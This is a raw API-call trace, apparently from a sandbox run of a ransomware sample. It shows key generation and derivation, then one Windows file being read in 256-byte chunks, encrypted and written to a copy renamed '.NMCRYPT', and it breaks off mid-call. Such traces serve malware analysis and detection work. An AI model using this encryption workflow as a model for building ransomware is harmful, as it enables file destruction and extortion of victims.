[0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.552] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.552] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.552] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0144.553] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.553] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad3b8) returned 1 [0144.553] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0144.553] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0144.553] wcslen (_String="\\\\?\\") returned 0x4 [0144.553] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad238) returned 1 [0144.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0144.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0144.553] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=46624) returned 1 [0144.554] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0144.555] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.559] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.559] GetLastError () returned 0x0 [0144.559] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.569] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.570] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.570] GetLastError () returned 0x0 [0144.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.570] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.570] GetLastError () returned 0x0 [0144.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.570] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.570] GetLastError () returned 0x0 [0144.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.570] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.570] GetLastError () returned 0x0 [0144.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.570] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.570] GetLastError () returned 0x0 [0144.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.570] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.571] GetLastError () returned 0x0 [0144.571] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.571] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.571] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.571] GetLastError () returned 0x0 [0144.571] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.571] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.571] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.571] GetLastError () returned 0x0 [0144.571] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.571] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.571] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.571] GetLastError () returned 0x0 [0144.571] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.571] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.571] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.571] GetLastError () returned 0x0 [0144.571] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.571] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.572] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.572] GetLastError () returned 0x0 [0144.572] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.572] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.572] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.572] GetLastError () returned 0x0 [0144.572] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.572] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.572] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.572] GetLastError () returned 0x0 [0144.572] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.572] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.572] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.572] GetLastError () returned 0x0 [0144.572] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.572] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.572] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.572] GetLastError () returned 0x0 [0144.572] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.572] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.572] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.572] GetLastError () returned 0x0 [0144.572] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.573] GetLastError () returned 0x0 [0144.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.573] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.573] GetLastError () returned 0x0 [0144.573] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.573] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, 